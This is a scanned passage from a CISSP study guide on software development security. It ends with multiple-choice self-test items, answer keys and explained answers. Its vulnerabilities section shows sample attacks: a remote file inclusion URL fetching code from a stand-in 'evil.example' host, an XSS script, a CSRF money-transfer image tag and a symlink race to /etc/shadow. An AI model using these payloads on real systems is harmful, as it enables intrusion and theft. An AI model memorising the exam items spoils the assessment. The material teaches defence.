components together to build applications, and take advantage of Windows services. 
COM objects can be created with a variety of programming languages. Object-ori- 
ented languages, such as C++, provide programming mechanisms that simplify the 
implementation of COM objects. The family of COM technologies includes COM+, 
Distributed COM (DCOM), and ActiveX® Controls.” [36] COM+ is an extension to 
COM, introduced in Microsoft Windows 2000. ActiveX is discussed in Chapter 4, 
Domain 3: Security Engineering. 

DCOM is a networked sequel to COM: “Microsoft® Distributed COM (DCOM) 
extends the Component Object Model (COM) to support communication among 
objects on different computers — on a LAN, a WAN, or even the Internet. With 
DCOM, your application can be distributed at locations that make the most sense 
to your customer and to the application.” [37] DCOM includes Object Linking and 
Embedding (OLE), a way to link documents to other documents. 

Both COM and DCOM are being supplanted by Microsoft.NET, which can 
interoperate with DCOM, but offers advanced functionality to both COM and DCOM. 

CORBA 

Common Object Request Broker Architecture (CORBA) is an open vendor-neutral 
networked object broker framework by the Object Management Group (OMG). 
CORBA competes with Microsoft’s proprietary DCOM. CORBA objects communi- 
cate via a message interface, described by the Interface Definition Language (IDL). 
See http://www.corba.org for more information about CORBA. 

The essence of CORBA, beyond being a networked object broker, is the 
separation of the interface (syntax for communicating with an object) from the 
instance (the specific object): “The interface to each object is defined very strictly. 
In contrast, the implementation of an object — its running code, and its data — is 
hidden from the rest of the system (i.e., encapsulated) behind a boundary that 
the client may not cross. Clients access objects only through their advertised 
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interface, invoking only those operations that the object exposes through its IDL 
interface, with only those parameters (input and output) that are included in the 
invocation.” [38] 

In addition to locating objects over a network, CORBA enforces fundamental 
object-oriented design: low-level details are encapsulated (hidden) from the client. 
The objects perform their methods without revealing how they do it. Implemented 
focus on connections, and not on code. 

OBJECT-ORIENTED ANALYSIS (00A) AND OBJECT-ORIENTED 
DESIGN (00D) 

Object-Oriented Analysis (OOA) and Object-Oriented Design (OOD) are a software 
design methodology that takes the concept of objects to a higher, more conceptual, 
level than OOP. The two terms are sometimes combined as Object-Oriented Analysis 
and Design (OOAD). 

It is like drawing a flowchart on a whiteboard that shows how a program should 
conceptually operate. The way data in a program flows and is manipulated is visual- 
ized as a series of messages and objects. Once the software design is complete, the 
code may be programmed in an OOP language such as Ruby. 

Object-Oriented Analysis (OOA) seeks to understand (analyze) a problem domain 
(the challenge you are trying to address) and identifies all objects and their interac- 
tion. Object-Oriented Design (OOD) then develops (designs) the solution. 

We will use Object-Oriented Analysis and Design to design a network intrusion 
detection system (NIDS). As we learned in Chapter 8, Domain 7: Security Opera- 
tions, a NIDS performs the following actions: 

1 . Sniffs packets from a network and converts them into pcap (packet capture) 
format; 

2 . Analyzes the packets for signs of attacks, which could include Denial of 
Service, client-side attacks, server-side attacks, web application attacks, and 
others; 

3 . If a malicious attack is found, the NIDS sends an alert. NIDS may send alerts 
via email, paging, syslog, or security information and event managers (SIEMs). 

The previous steps serve as the basis for our Object-Oriented Analysis. 
A sniffer object receives messages from the network in the form of packets. 
The sniffer converts the packets to pcap (packet capture) data, which it sends to 
the analysis object. The analysis object performs a number of functions (methods), 
including detecting denial of service, client-side, server-side, or web application 
attacks. If any are detected, it sends an alert message to the alerting object. The 
alerting object may also perform a number of functions, including alerting via 
email, paging, syslog, or SIEM. The NIDS Object-Oriented Design is shown in 
Figure 9.10. 

This NIDS design addresses the problem domain of alerting when malicious traf- 
fic is sent on the network. 
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FIGURE 9.10 OOD NIDS Design 


ASSESSING THE EFFECTIVENESS OF SOFTWARE SECURITY 

Once the project is underway and software has been programmed, the next steps are 
testing the software, focusing on the confidentiality, integrity, and availability of the 
system, the application, and the data processed by the application. Special care must 
be given to the discovery of software vulnerabilities that could lead to data or system 
compromise. Finally, organizations need to be able to gauge the effectiveness of their 
software creation process, and identify ways to improve it. 

SOFTWARE VULNERABILITIES 

Programmers make mistakes: this has been true since the advent of computer pro- 
gramming. In Code Complete, Steve McConnell says, “experience suggests that 
there are 15-50 errors per 1000 lines of delivered code.” [39] One thousand lines 
of code are sometimes called a KLOC; “K” stands for thousand. Following a formal 
application maturity framework model can lower this number. Watts S. Humphrey, a 
Fellow at Carnegie Mellon University’s Software Engineering Institute, claims that 
organizations that follow the SEI Capability Maturity Model (CMM, see “Software 
Capability Maturity Model” section below) can lower the number of errors to one in 
every KLOC. [40] 

Even one error per thousand lines of code can introduce large security risks, 
as our software becomes increasingly complex. Take Microsoft Windows, for 
example: “As a result, each new version of Windows carries the baggage of its past. 
As Windows has grown, the technical challenge has become increasingly daunting. 
Several thousand engineers have labored to build and test Windows Vista, a sprawl- 
ing, complex software construction project with 50 million lines of code, or more 
than 40% larger than Windows XP.” [41] Note that Microsoft has not released the 
numbers of lines of code of its recent operating systems, including Windows 10 and 
Server 2016. 
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If the Microsoft Vista programmers made only one error per KLOC, then 
Vista has 50,000 errors. Large software projects highlight the need for robust and 
methodical software testing methodologies. 


Types of Software Vulnerabilities 

This section will briefly describe common application vulnerabilities. Please also 
refer to the System Vulnerabilities, Threats and Countermeasures section of Chap- 
ter 4, Domain 3: Security Engineering for information regarding additional vulner- 
ability types. An additional source of up-to-date vulnerabilities can be found at 
“CWE/SANS Top 25 Most Dangerous Programming Errors,” available at http:// 
cwe.mitre.org/top25/; the following summary is based on this list. CWE refers 
to Common Weakness Enumeration, a dictionary of software vulnerabilities by 
MITRE (see: http://cwe.mitre.org/). SANS is the SANS Institute; see http://www. 
sans.org. 

• Hard-coded credentials: Backdoor username/passwords left by programmers in 
production code 

• Buffer Overflow: Occurs when a programmer does not perform variable bounds 
checking 

• SQL Injection: manipulation of a back-end SQL server via a front-end web 
server 

• Directory Path Traversal, escaping from the root of a web server (such as/var/ 
www) into the regular file system by referencing directories such as “../..” 

• PHP Remote File Inclusion (RFI): altering normal PHP URLs and variables 
such as “http://good.example.com?file=readme.txt” to include and execute 
remote content, such as: http://good. example. com?file = http://evil. example, 
com/bad.php [42] 


Buffer Overflows 

Buffer overflows can occur when a programmer fails to perform bounds checking. 
Here is pseudo-code for an “enter username” program. The program declares the 
Suscrname variable is 20 characters long, prints “Enter username:,” and then stores 
what the user types in the $username variable: 


variable $username [20 ] 
print "Enter Username: 
getstring ($username) 


This function contains a buffer overflow. The programmer declared $variable to 
be 20 bytes long, but does not perform bounds checking on the getstring function. 
The programmer assumed the user would type something like “bob.” 
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What if an attacker types 50 “A”s: 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


The answer: many programming languages, such as C, provide no built-in 
bounds checking: the first 20 bytes will be copied to the memory allocated for 
$username variable. The next 30 will overwrite the next 30 bytes of memory. 
That memory could contain other data or instructions. This is called “smashing 
the stack.” This technique can be used to insert and run shellcode (machine code 
language that executes a shell, such as Microsoft Windows cmd.exe or a UNIX/ 
Linux shell). 

Buffer overflows are mitigated by secure application development, including 
bounds checking. 

TOCTOU/Race Conditions 

Time of Check/Time of Use (TOCTOU) attacks are also called race conditions : 
an attacker attempts to alter a condition after it has been checked by the operating 
system, but before it is used. TOCTOU is an example of a state attack, where the 
attacker capitalizes on a change in operating system state. 

Here is pseudo-code for a setuid root program (runs with super user privi- 
leges, regardless of the running user) called “open test file” that contains a race 
condition: 

1 . If the file “test” is readable by the user 

2. Then open the file “test” 

3. Else print “Error: cannot open file.” 

The race condition occurs between steps 1 and 2. Remember that most modern 
computers are multitasking: the CPU executes multiple processes at once. Other pro- 
cesses are running while our “open test file” program is running. In other words, the 
computer may run our program like this: 

1 . If the file “test” is readable by the user 

2. Run another process 

3. Run another process 

4. Then open the file “test” 

An attacker may read any file on the system by changing the file “test” from a 
file to a symbolic link (like a desktop shortcut), between the “if’ (time of check) and 
“then” (time of use) statements: 

1 . If the file “test” is readable by the user 

2. Attacker deletes “test,” creates symbolic link from “test” to /etc/shadow 

3. Run another process 

4. Then open the file “test” (now a symbolic link to /etc/shadow) 
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If the attacker wins the race (changes the status of “test” between the “if’ and the 
“then”), “test” is a symbolic link that points to /etc/shadow. The setuid root program 
will then open the symbolic link, opening the /etc/shadow file. 

Cross Site Scripting and Cross Site Request Forgery 

Cross-Site Scripting (XSS) leverages third-party execution of web scripting 
languages such as JavaScript within the security context of a trusted site. Cross-Site 
Request Forgery (CSRF, or sometimes XSRF) leverages third-party redirect of static 
content within the security context of a trusted site. Cross-Site Scripting and Cross- 
Site Request Forgery are often confused. They are both web attacks: the difference is 
XSS executes a script in a trusted context: 


<script>alert ("XSS Test! ") ;</script> 


The previous code would pop up a harmless “XSS Test!” alert. A real attack 
would include more JavaScript, often stealing cookies or authentication credentials. 
XSS may also be used to ‘hook’ browsers, which allows an attacker to take remote 
control of a user’s browser, and pivot through it. A pivot allows the attacker to 
establish a foothold ‘behind enemy lines’ (behind the firewall) and surf to internal 
websites, etc. To learn more about this concept, see the BeEF (Browser Exploitation 
Framework Project) project at: http://beefproject.com/. 

CSRF often tricks a user into processing a URL (sometimes by embedding the 
URL in an HTML image tag) that performs a malicious act, for example tricking a 
white hat into rendering the following image tag: 


<img src="https : //bank . example . com/ transf er-money?f rom=WHITEHAT&to=BLACKHAT"> 


Privilege Escalation 

Privilege escalation vulnerabilities allow an attacker with (typically limited) access 
to be able to access additional resources. Vertical escalation leverages non-privileged 
access into higher-level access. One example is escalating privileges from a normal 
Unix user into root access (UID 0). 

Horizontal escalation allows an attacker to access other accounts, such as pivot- 
ing from one non-privileged account to another (with access to different resources). 

Improper software configurations and poor coding and testing practices often 
cause privilege escalation vulnerabilities. 

Backdoors 

Backdoors are shortcuts in a system that allow a user to bypass security checks (such 
as username/password authentication) to log in. Attackers will often install a back- 
door after compromising a system. For example, an attacker gains shell access to a 
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system by exploiting a vulnerability caused by a missing patch. The attacker wants 
to maintain access (even if the system is patched), so she installs a backdoor to allow 
future access. 

DISCLOSURE 

Disclosure describes the actions taken by a security researcher after discovering a 
software vulnerability. This topic has proven controversial: what actions should you 
take if you discover a flaw in well-known software such as the Apache web server or 
Microsoft’s IIS (Internet Information Services) web server? 

Assuming you are a white hat (ethical) researcher, the risk is not that you under- 
stand the vulnerability: the risk is that others may independently discover the vulner- 
ability, or may have already done so. If the others are black hats (unethical), anyone 
running the vulnerable software is at risk. 

The ethical researcher could privately inform the vendor responsible for the soft- 
ware, and share the research that indicated the software was vulnerable. This process 
works well if the vendor quickly releases a fix or a patch for the vulnerability, but 
what if the vendor does nothing? 

Full Disclosure is the controversial practice of releasing vulnerability details 
publicly. The rationale is this: if the bad guys may already have the information, 
then everyone should also have it. This ensures the white hats also receive 
the information, and will also pressure the vendor to patch the vulnerability. 
Advocates argue that vulnerable software should be fixed as quickly as possible; 
relying on (perceived) lack of knowledge of the vulnerability amounts to “Security 
through obscurity,” which many argue is ineffective. The Full Disclosure mailing 
list (see: http://insecure.org/news/fulldisclosure/) is dedicated to the practice of 
full disclosure. 

The practice of full disclosure is controversial (and considered unethical by 
many) because many black hats (including script kiddies) may benefit from this prac- 
tice; zero-day exploits (exploits for vulnerabilities with no patch) are more likely to 
be developed, and additional innocent organizations may be harmed. 

Responsible disclosure is the practice of privately sharing vulnerability infor- 
mation with a vendor, and withholding public release until a patch is available. 
This is generally considered to be the ethical disclosure option. Other options exist 
between full and responsible disclosure, including privately sharing vulnerability 
information with a vendor, but including a deadline, such as “I will post the vul- 
nerability details publicly in three months, or after you release a patch, whichever 
comes first.” 

SOFTWARE CAPABILITY MATURITY MODEL (CMM) 

The Software Capability Maturity Model (CMM) is a maturity framework for evalu- 
ating and improving the software development process. Carnegie Mellon Univer- 
sity’s (CMU) Software Engineering Institute (SEI) developed the model. It is now 
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managed by the CMMI Institute, “a 100%-controlled subsidiary of Carnegie Innova- 
tions, Carnegie Mellon University’s technology commercialization enterprise.” [43] 
The goal of CMM is to develop a methodical framework for creating quality 
software that allows measurable and repeatable results: “Even in undisciplined 
organizations, however, some individual software projects produce excellent results. 
When such projects succeed, it is generally through the heroic efforts of a dedicated 
team, rather than through repeating the proven methods of an organization with a 
mature software process. In the absence of an organization-wide software process, 
repeating results depends entirely on having the same individuals available for the 
next project. Success that rests solely on the availability of specific individuals pro- 
vides no basis for long-term productivity and quality improvement throughout an 
organization. Continuous improvement can occur only through focused and sustained 
effort towards building a process infrastructure of effective software engineering and 
management practices.” [44] 

The five levels of CMM are described in (see: http://www.sei.cmu.edu/ 
reports/93tr024.pdf): 

1 . Initial. The software process is characterized as ad hoc, and occasionally even 
chaotic. Few processes are defined, and success depends on individual effort. 

2 . Repeatable'. Basic project management processes are established to track cost, 
schedule, and functionality. The necessary process discipline is in place to 
repeat earlier successes on projects with similar applications. 

3 . Defined: The software process for both management and engineering activities 
is documented, standardized, and integrated into a standard software process for 
the organization. Projects use an approved, tailored version of the organization’s 
standard software process for developing and maintaining software. 

4 . Managed : Detailed measures of the software process and product quality are 
collected, analyzed, and used to control the process. Both the software process 
and products are quantitatively understood and controlled. 

5 . Optimizing: Continual process improvement is enabled by quantitative feedback 
from the process and from piloting innovative ideas and technologies. [45] 

ACCEPTANCE TESTING 

Acceptance testing tests whether software meets various end-state requirements, from 
a user or customer, contract or compliance perspective. The ISTQB (International Soft- 
ware Testing Qualifications Board) defines acceptance testing as: “a formal testing with 
respect to user needs, requirements, and business processes conducted to determine 
whether or not a system satisfies the acceptance criteria and to enable the user, custom- 
ers or other authorized entity to determine whether or not to accept the system.” [46] 
The ISTQB also list four levels of acceptance testing: 

• “The User Acceptance test: focuses mainly on the functionality thereby 
validating the fitness-for-use of the system by the business user. The user 
acceptance test is performed by the users and application managers. 
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• The Operational Acceptance test: also known as Production acceptance test 
validates whether the system meets the requirements for operation. In most of 
the organization the operational acceptance test is performed by the system 
administration before the system is released. The operational acceptance test 
may include testing of backup/restore, disaster recovery, maintenance tasks and 
periodic check of security vulnerabilities. 

• Contract Acceptance testing: It is performed against the contract’s acceptance 
criteria for producing custom developed software. Acceptance should be 
formally defined when the contract is agreed. 

• Compliance acceptance testing: It is also known as regulation acceptance 
testing is performed against the regulations which must be adhered to, such as 
governmental, legal or safety regulations.” [47] 


ASSESSING THE SECURITY IMPACT OF ACQUIRED SOFTWARE 

We would like to believe that we can trust vendor claims regarding a product’s 
capabilities. Vendor claims should be taken as marketing until proven to be true. 
Don’t rely simply on vendor’s claims even regarding basic capabilities. 

An important point is to gather requirements before reviewing products. If 
requirements are defined after products are reviewed vendors might be able to 
convince the organization that it has specific needs that only their product can 
fill. Don’t let products or marketing determine what the organization “needs” in 
a product. 

Commercial Off-the-Shelf (COTS) Software 

Vendor claims are more readily verifiable for Commercial Off-the-Shelf (COTS) 
Software. With COTS, perform a bake-off to compare products that already 
meet requirements. Don’t rely on product roadmaps to become reality. A 
particularly important security requirement is to look for integration with existing 
infrastructure and security products. While best-of-breed point products might be 
the organization’s general preference, recognize that an additional administrative 
console, with additional user provisioning, will add to the operational costs of 
the product. Consider the TCO of the product not just the capital expense and 
annual maintenance costs. 

Vendors’ claims are more readily verifiable with COTS software as the product 
can be evaluated to determine whether it actually provides the stated capabilities. 

Third-party research and analysis organizations provide assessments of various 
players in a space, which can provide basic (albeit potentially biased) comparisons 
of products without requiring extensive in-house testing. 

Customers of the vendor can often be contacted. Of course if those contacts are 
provided by the vendor themselves, then be cautious with accepting claims. A better 
approach would be to find someone on your own that is using the product and query 
them concerning Pros/Cons Likes/Dislikes. 
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Some questions/concerns for COTS: What happens if the vendor goes out of busi- 
ness? What happens if a critical feature is missing? How easy is it to find in-house or 
third-party support for the vendor’s products? 

Custom-Developed Third Party Products 

An alternative to COTS is to employee custom developed applications. These custom 
developed third-party applications provide both additional risks and potential ben- 
efits beyond COTS. Contractual language and Service Level Agreements (SLA) are 
vital when dealing with third-party development shops. Never assume that security 
will be a consideration in the development of the product unless they are contractu- 
ally obligated to provide security capabilities. 

Basic security requirements should be discussed in advance of signing the con- 
tracts and crafting the SLAs to ensure that the vendor expects to be able to deliver 
those capabilities. Much like COTS, key questions include: What happens if the ven- 
dor goes out of business? What happens if a critical feature is missing? How easy is 
it to find in-house or third-party support for the vendor’s products? 


ARTIFICIAL INTELLIGENCE 

Computers compute: they do exactly what they are told. The term “computer” was 
first used in 1613 to describe a person who added numbers. Artificial Intelligence 
is the science of programming electronic computers to “think” more intelligently, 
sometimes mimicking the ability of mammal brains. 

EXPERT SYSTEMS 

Expert systems consist of two main components. The first is a knowledge base that 
consists of “if/then” statements. These statements contain rules that the expert system 
uses to make decisions. The second component is an inference engine that follows 
the tree formed by the knowledge base, and fires a rule when there is a match. 

Here is a sample “the Internet is down” Expert System, which may be used by a 
help desk when a user calls to complain that they cannot reach the Internet: 

1 . If your computer is turned on 
a. Else: turn your computer on 

2 . Then if your monitor is turned on 
a. Else: turn your monitor on 

3 . Then if your OS is booted and you can open a cmd.exe prompt 
a. Else: repair OS 

4 . Then if you can ping 127.0.0.1 

a. Else: check network interface configuration 


470 CHAPTER 9 Doma in 8: Software Development Security 


5. Then if you can ping the local gateway 
a. Else: check local network connection 

6 . Then if you can ping Internet address 192.0.2.187 
a. Else: check gateway connectivity 

7. Then if you can ping syngress.com 
a. Else: check DNS 

Forward chaining begins with no premise (“Is the computer turned on” in our 
previous example), and works forward to determine a solution. Backward chaining 
begins with a premise (“Maybe DNS is broken”), and works backwards. 

The integrity of the knowledge base is critical. The entire knowledge base should 
form a logical tree, beginning with a trunk (“Is the computer turned on” in our pre- 
vious example). The knowledge base should then branch out. The inference engine 
follows the tree, branching or firing as if/then statements are answered. 

There should be no circular rules; an example of a circular rule using our previ- 
ous example: “If your computer is turned on, then if your monitor is turned on, then 
if your OS is booted and you can open a cmd.exe prompt, then if your computer is 
turned on...” There should also be no unreferenced rules (branches that do not con- 
nect to the knowledge base tree). 


ARTIFICIAL NEURAL NETWORKS 

Artificial Neural Networks (ANN) simulate neural networks found in humans and 
animals. The human brain’s neural network has 100 billion neurons, interconnected 
by thousands or more synapses each. Each neuron may fire based on synaptic input. 
This multilayer neural network is capable of making a single decision based on 
thousands or more inputs. 

Real Neural Networks 

Let us discuss how a real neural network operates: Imagine you are walking down 
the street in a city at night, and someone is walking behind you closely. You begin to 
become nervous: it is late; it is dark; and the person behind you is too close. You must 
make a decision: fight or flight. You must decide to turn around to face your pursuer, 
or to get away from them. 

As you are making your decision, you weigh thousands upon thousands of inputs. 
You remember past experience; your instincts guide you, and you perceive the world 
with your five senses. These senses are sending new input to your brain, millisecond 
by millisecond. Your memory, instincts, sight, smell, hearing, etc., all continually 
send synaptic input to neurons. Less important input (such as taste in this case) has 
a lower synaptic weight. More important input (such as sound) has a higher synaptic 
weight. Neurons that receive higher input are more likely to fire, and the output 
neuron eventually fires (makes a decision). 
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FIGURE 9.1 1 Multi-Layer Artificial Neural Network 


Finally, you decide to turn and face your pursuer, and you are relieved to see it 
was a person listening to music on headphones, not paying attention to their sur- 
roundings. Thousands of inputs resulted in a binary decision: fight or flight. ANNs 
seek to replicate this complex decision-making process. 

How Artificial Neural Networks Operate 

ANNs seek to replicate the capabilities of biological neural networks. A node is 
used to describe an artificial neuron. Like its biologic counterpart, these nodes 
receive input from synapses and send output when a weight is exceeded. Single- 
layer ANNs have one layer of input nodes; multilayer ANNs have multiple 
layers of nodes, including hidden nodes, as shown in Figure 9.11. The arrows in 
Figure 9.11 represent the synaptic weights. Both single and multilayer artificial 
neural networks eventually trigger an output node to fire: this output node makes 
the decision. 

An Artificial Neural Network learns by example via a training function: syn- 
aptic weights are changed via an iterative process, until the output node fires cor- 
rectly for a given set of inputs. Artificial Neural Networks are used for “fuzzy” 
solutions, where exactness is not always required (or possible), such as predicting 
the weather. 

BAYESIAN FILTERING 

Bayesian filtering is named after Thomas Bayes, an English clergyman who devised 
a number of probability and statistical methods including “a simple mathematical 
formula used for calculating conditional probabilities.” [50] 
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Bayesian filtering is commonly used to identify spam. Paul Gram described 
Bayesian filtering to identify spam in his paper “A Plan for Spam” (see: www. 
paulgraham.com/spam.html). He described using a “corpus” of “spam” and “ham,” 
human-selected groups of spam and non-spam, respectively. He then used Bayesian 
filtering techniques to automatically assign a mathematical probability that certain 
“tokens” (words in the email) were indications of spam. 


GENETIC ALGORITHMS AND PROGRAMMING 

Genetic Algorithms and Programming fundamentally change the way software is 
developed: instead of being coded by a programmer, they evolve to solve a prob- 
lem. Genetic Algorithms and Programming seek to replicate nature’s evolution, 
where animals evolve to solve problems. Genetic programming refers to creat- 
ing entire software programs (usually in the form of Lisp source code); genetic 
algorithms refer to creating shorter pieces of code (represented as strings called 
chromosomes). 

Both are automatically generated, and then “bred” through multiple generations 
to improve via Darwinian principles: “Genetic algorithms are search algorithms 
based on the mechanics of natural selection and natural genetics. They combine sur- 
vival of the fittest among string structures with a structured yet randomized informa- 
tion exchange to form a search algorithm with some of the innovative flair of human 
search. In every generation, a new set of artificial creatures (strings) is created using 
bits and pieces of the fittest of the old; an occasional new part is tried for good mea- 
sure. While randomized, genetic algorithms are no simple random walk. They effi- 
ciently exploit historical information to speculate on new search points with expected 
improved performance.” [5 1 ] 

Genetic programming creates random programs and assigns them a task of 
solving a problem. Th e. fitness function describes how well they perform their task. 
Crossover “breeds” two programs together (swaps their code). Mutation introduces 
random changes in some programs. John R. Koza described the process in “Genetic 
Programming: On the Programming of Computers by Means of Natural Selection.” 
The process is summarized here: 

• “Generate an initial population of random computer programs 

• Execute each program in the population and assign it a fitness value according 
to how well it solves the problem. 

• Create a new population of computer programs. 

• Copy the best existing programs 

• Create new computer programs by mutation. 

• Create new computer programs by crossover (sexual reproduction)” [52] 

Genetic Algorithms and Genetic Programming have been used to program a Pac- 
Man playing program, robotic soccer teams, networked intrusion detection systems, 
and many others. 
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SUMMARY OF EXAM OBJECTIVES 

We live in an increasingly computerized world, and software is everywhere. The 
confidentiality, integrity, and availability of data processed by software are critical, 
as is the normal functionality (availability) of the software itself. This domain has 
shown how software works, and the challenges programmers face while trying to 
write error-free code that is able to protect data (and itself) in the face of attacks. 

Following a formal methodology for developing software, followed by a rigorous 
testing regimen, are best practices. We have seen that following a software develop- 
ment maturity model such as the Capability Maturity Model (CMM) can dramati- 
cally lower the number of errors programmers make. The five steps of CMM follow 
the process most programming organizations follow, from an informal process to a 
mature process which always seeks improvement: initial, repeatable, defined, man- 
aged, and optimizing. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . What software design methodology uses paired programmers? 

A. Agile 

B. Extreme Programming (XP) 

C. Sashimi 

D. Scrum 

2 . What form of Artificial Intelligence uses a knowledge base and an inference 
engine? 

A. Artificial Neural Network (ANN) 

B. Bayesian Filtering 

C. Expert System 

D. Genetic Algorithm 

3 . Which of the following definitions describe open source software? 

A. Freeware 

B. Gnu Public License (GPL) software 

C. Public domain software 

D. Software released with source code 

4 . What describes a more agile development and support model, where 
developers directly support operations? 

A. DevOps 

B. Sashimi 
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C. Spiral 

D. Waterfall 

5. At what phase of the (Systems Development Life Cycle) SDLC should 
security become part of the process? 

A. Before initiation 

B. During development/acquisition 

C. When the system is implemented 

D. SDLC does not include a security process 

6 . An object acts differently, depending on the context of the input message. 
What Object-Oriented Programming concept does this illustrate? 

A. Delegation 

B. Inheritance 

C. Polyinstantiation 

D. Polymorphism 

7. Two objects with the same name have different data. What Object-Oriented 
Programming concept does this illustrate? 

A. Delegation 

B. Inheritance 

C. Polyinstantiation 

D. Polymorphism 

8. What type of testing determines whether software meets various end-state 
requirements, from a user or customer, contract or compliance perspective? 

A. Acceptance Testing 

B. Integration Testing 

C. Regression Testing 

D. Unit Testing 

9. A programmer allocates 20 bytes for a username variable, and an attacker 
enters a username that is 1,000 bytes long. All 1,000 bytes are copied to the 
stack. What type of attack did the attacker perform? 

A. Buffer Overflow 

B. Cross Site Scripting (XSS) 

C. Fuzzing 

D. Time of Check/Time of Use (TOC/TOU) 

1 0. What type of database language is used to create, modify, and delete 
tables? 

A. Data Definition Language (DDL) 

B. Data Manipulation Language (DML) 

C. Database Management System (DBMS) 

D. Structured Query Language (SQL) 

11. A database contains an entry with an empty primary key. What database 
concept has been violated? 

A. Entity Integrity 

B. Normalization 

C. Referential Integrity 
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D. Semantic Integrity 

1 2. Which vulnerability allows a third party to redirect of static content within the 
security context of a trusted site? 

A. Cross-Site Request Forgery (CSRF) 

B. Cross-Site Scripting (XSS) 

C. P1TP Remote File Inclusion (RFI) 

D. SQL Injection 

1 3. What language allows CORBA (Common Object Request Broker 
Architecture) objects to communicate via a message interface? 

A. Distributed Component Object Model (DCOM) 

B. Interface Definition Language (IDL) 

C. Object Linking and Embedding (OLE) 

D. Object Management Guidelines (OMG) 

1 4. What database high availability option allows multiple clients to access 
multiple database servers simultaneously? 

A. Database commit 

B. Database journal 

C. Replicated database 

D. Shadow database 

1 5. What component of an expert system consists of “if/then” statements? 

A. Backward chaining 

B. Forward chaining 

C. Inference engine 

D. Knowledge base 


SELF TEST QUICK ANSWER KEY 

1. B 

2. C 

3. D 

4. A 

5. A 

6. D 

7. C 

8. A 

9. A 

10. A 

11. A 

12. A 

13. B 

14. C 

15. D 
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CHAPTER 2: DOMAIN 1: SECURITY AND RISK MANAGEMENT 

1 . Which of the following would be an example of a policy statement? 

A. Protect PII by hardening servers 

B. Harden Windows 7 by first installing the pre-hardened OS image 

C. You may create a strong password by choosing the first letter of each word 
in a sentence and mixing in numbers and symbols 

D. Download the CISecurity Windows benchmark and apply it 

Correct Answer and Explanation: A. Answer A is correct; policy is high level and 
avoids technology specifics. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. B is a procedural statement. C is a guideline. D is a baseline. 

2 . Which of the following describes the money saved by implementing a security 

control? 

A. Total Cost of Ownership 

B. Asset Value 

C. Return on Investment 

D. Control Savings 

Correct Answer and Explanation: C. Answer C is correct; Return on Investment 
(ROI) is the amount of money saved by protecting an asset with a security control. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. Total Cost of Ownership is the cost of implementing a security control. 
Asset Value is the value of the protected asset. Control Savings is a distracter answer 
that describes ROI without using the proper term. 

3 . Which of the following is an example of program policy? 

A. Establish the information security program 

B. Email Policy 

C. Application development policy 

D. Server policy 

Correct Answer and Explanation: A. Answer A is correct; the program policy 
establishes the information security program. 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. Email policy and application development policy are issue-specific policies. 
Server policy is system-specific policy. 

4 . Which of the following proves an identity claim? 

A. Authentication 

B. Authorization 
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C. Accountability 

D. Auditing 

Correct Answer and Explanation: A. Answer A is correct; authentication proves 
an identity claim. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. Authorization describes the actions a subject is allowed to take. Account- 
ability holds users accountable by providing audit data. Auditing verifies compliance 
with an information security framework. 

5 . Which of the following protects against unauthorized changes to data? 

A. Confidentiality 

B. Integrity 

C. Availability 

D. Alteration 

Correct Answer and Explanation: B. Answer B is correct; integrity protects 
against unauthorized changes to data. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Confidentiality protects against unauthorized disclosure of data. Availabil- 
ity means systems are available for normal business use. Alteration is unauthorized 
changes to data: the opposite of integrity. 

Use the following scenario to answer questions 6-8: 

Your company sells Apple iPods online and has suffered many denial of service 
(DoS) attacks. Your company makes an average $20,000 profit per week, and a typi- 
cal DoS attack lowers sales by 40%. You suffer seven DoS attacks on average per 
year. A DoS -mitigation service is available for a subscription fee of $10,000 per 
month. You have tested this service, and believe it will mitigate the attacks. 

6 . What is the Annual Rate of Occurrence in the above scenario? 

A. $20,000 

B. 40% 

C. 7 

D. $10,000 

Correct Answer and Explanation: C. Answer C is correct; the Annual Rate of 
Occurrence is the number of attacks in a year. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. $20,000 is the Asset value (AV). Forty percent is the Exposure Factor 
(EF). $10,000 is the monthly cost of the DoS service (used to calculate TCO). 

7 . What is the annualized loss expectancy (ALE) of lost iPod sales due to the 

DoS attacks? 

A. $20,000 

B. $8000 

C. $84,000 

D. $56,000 
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Correct Answer and Explanation: D. Answer D is correct; Annualized Loss 
Expectancy (ALE) is calculated by first calculating the Single Loss Expectancy 
(SLE), which is the Asset Value (AV, $20,000) times the Exposure Factor (EF, 40%). 
The SLE is $8000; multiply by the Annual rate of Occurrence (ARO, 7) for an ALE 
of $56,000. 

Incorrect Answers and Explanations: A, B, and C. Answers A , B , and C are 
incorrect. $20,000 is the Asset Value. $8000 is the Single Loss Expectancy. 

8 . Is the DoS mitigation service a good investment? 

A. Yes, it will pay for itself 

B. Yes, $10,000 is less than the $56,000 Annualized Loss Expectancy 

C. No, the annual Total Cost of Ownership is higher than the Annualized 
Loss Expectancy 

D. No, the annual Total Cost of Ownership is lower than the Annualized Loss 
Expectancy 

Correct Answer and Explanation: C. Answer C is correct; the Total Cost of Own- 
ership (TCO) of the DoS mitigation service is higher than Annualized Loss Expec- 
tancy (ALE) of lost sales due to DoS attacks. This means it’s less expensive to accept 
the risk of DoS attacks (or find a less expensive mitigation strategy). 

Incorrect Answers and Explanations: A , B, and D. Answers A, B. and D are 
incorrect. A is incorrect: the TCO is higher, not lower. $10,000 is the monthly TCO; 
you must calculate yearly TCO to compare with the ALE. D is wrong: the annual 
TCO is higher, not lower. 

9 . Which of the following steps would be taken while conducting a Qualitative 

Risk Analysis? 

A. Calculate the Asset Value 

B. Calculate the Return on Investment 

C. Complete the Risk Analysis Matrix 

D. Complete the Annualized Loss Expectancy 

Correct Answer and Explanation: C. Answer C is correct; the Risk Analysis 
Matrix uses approximate values, from 1 through 5 to qualitatively analyze risks 
according to likelihood and consequences. 

Incorrect Answers and Explanations: A , B, and D. Answers A, B. and D are 
incorrect. All are quantitative Risk Analysis steps. 

10 . What is the difference between a standard and a guideline? 

A. Standards are compulsory and guidelines are mandatory 

B. Standards are recommendations and guidelines are requirements 

C. Standards are requirements and guidelines are recommendations 

